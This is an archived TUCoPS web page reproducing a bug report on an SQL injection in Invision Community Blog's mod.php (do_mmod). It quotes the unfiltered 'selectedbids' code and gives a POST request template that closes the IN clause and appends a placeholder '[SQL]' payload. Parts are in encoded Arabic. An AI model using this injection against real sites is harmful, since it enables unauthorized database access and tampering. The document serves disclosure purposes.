TUCoPS :: Web BBS :: Frequently Exploited :: b06-2031.htm

Invision Community Blog .. Bugs
Invision Community Blog .. Bugs
Invision Community Blog .. Bugs



[LEFT]=0D
Invision Community Blog .. Bugs=0D
=0D
SQL Injection :-=0D
=0D
    Filename 	  :- mod.php=0D
    Function name :- do_mmod()=0D
=0D
The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->=0D
* Arabic *=0D
[/LEFT]=0D
[RIGHT]=0D
=C7=E1=E3=CA=DB=ED=D1 $ids =DB=ED=D1 =E3=DD=E1=CA=D1 =DA=E4 =D8=D1=ED=DE =C7=E1=CF=C7=E1=E5 intval =E6=E5=E6 =C8=D4=DF=E1 =E3=D5=DD=E6=DD=E5 .. =E1=E5=D0=C7 =C7=E1=D3=C8=C8 =E3=E3=DF=E4 =DA=E3=E1 =F7=CD=DE=E4=E5=0D
[/RIGHT]=0D
[LEFT]=0D
[php]=0D
$ids = array();=0D
$ids = explode( ',', $this->ipsclass->input['selectedbids'] );=0D
=0D
...=0D
=0D
$ids = implode( ',', $ids );=0D
=0D
...=0D
=0D
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), "blog_id IN ({$ids})" );=0D
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );=0D
$this->ipsclass->DB->simple_exec();=0D
=0D
....=0D
=0D
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), "blog_id IN ({$ids})");=0D
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );=0D
=0D
....=0D
=0D
[/php]=0D
[/LEFT]=0D
[RIGHT]=0D
*=C7=E1=C7=D3=CA=DB=E1=C7=E1*=0D
[/RIGHT]=0D
[LEFT]=0D
Exploit :-=0D
=0D
    GET ^=0D
    	/IBP/index.php?=0D
    POST ^=0D
    	automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin=0D
[/LEFT]=0D
=0D
=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH